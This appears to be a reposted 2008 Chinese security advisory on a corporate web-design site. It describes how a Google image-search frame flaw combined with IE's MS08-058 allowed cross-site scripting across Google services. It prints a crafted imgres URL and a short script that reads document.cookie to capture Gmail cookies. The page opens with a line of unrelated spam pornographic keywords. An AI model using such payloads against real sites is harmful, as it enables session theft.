午夜日韩综合激情视频在线观看 ,丝袜美腿制服诱惑中文字幕,天堂资源网一区二区三区

跨站腳本漏洞,利用MS08-058攻擊Google

發(fā)布日期：2008-10-22　　關(guān)鍵詞:觀蘭網(wǎng)站建設(shè)★觀蘭網(wǎng)頁設(shè)計◆觀瀾網(wǎng)站制作　　已有 7766 人瀏覽

國內(nèi)安全組織80sec近日發(fā)現(xiàn)，Google提供的圖片搜索服務(wù)存在安全問題，結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞，幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

漏洞說明：Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應(yīng)用程序產(chǎn)品線，涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯(lián)網(wǎng)幾乎所有的應(yīng)用業(yè)務(wù)。80sec發(fā)現(xiàn)Google提供的圖片搜索服務(wù)存在安全問題，結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞，幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

漏洞站點：http://www.google.com

漏洞解析：Google提供的圖片搜索服務(wù)存在網(wǎng)頁框架安全問題，惡意攻擊者可以指定網(wǎng)頁的內(nèi)嵌框架頁指向任意網(wǎng)頁。該服務(wù)提供的URL地址主域名可以更改成Google的其他業(yè)務(wù)的子域名，從而造成嚴(yán)重的釣魚網(wǎng)頁攻擊隱患。如下：黑客指定imgrefurl參數(shù)就可能構(gòu)造GMAIL相關(guān)服務(wù)的釣魚網(wǎng)頁。

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

該漏洞結(jié)合由80SEC團(tuán)隊成員發(fā)現(xiàn)的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞，linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網(wǎng)頁框架安全問題，子框架網(wǎng)頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制，可以跨域控制其他域的網(wǎng)頁，影響所有的WEB應(yīng)用。微軟已經(jīng)在08年10月提供了MS08-058補(bǔ)丁修復(fù)了該漏洞。

測試代碼：

將Google的漏洞頁指向MS08-058漏洞攻擊頁

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

MS08-058.htm內(nèi)容

<script> setTimeout ( function(){ parent.location.href = new String("javascript:alert(document.cookie)"); } ,1500); </script>

即可獲得GAMIL的Cookie信息

危害提醒：

黑客利用瀏覽器漏洞可以使這種類型的低風(fēng)險Web安全漏洞擴(kuò)大成影響所有Web應(yīng)用的高風(fēng)險安全問題，請各大網(wǎng)站及安全管理人員仔細(xì)分析評估MS08-058類型的Web安全問題。

注：本文來自深一集團(tuán)原創(chuàng)或轉(zhuǎn)截 http://51mes.com/newslist_462_2.html 如需轉(zhuǎn)載，請注明出處！

上一條：新版?zhèn)€性化首頁iGoogle上線即遭用戶炮轟

下一條：SEO中級版：百度收錄并非終極目標(biāo)

< 返回上級新聞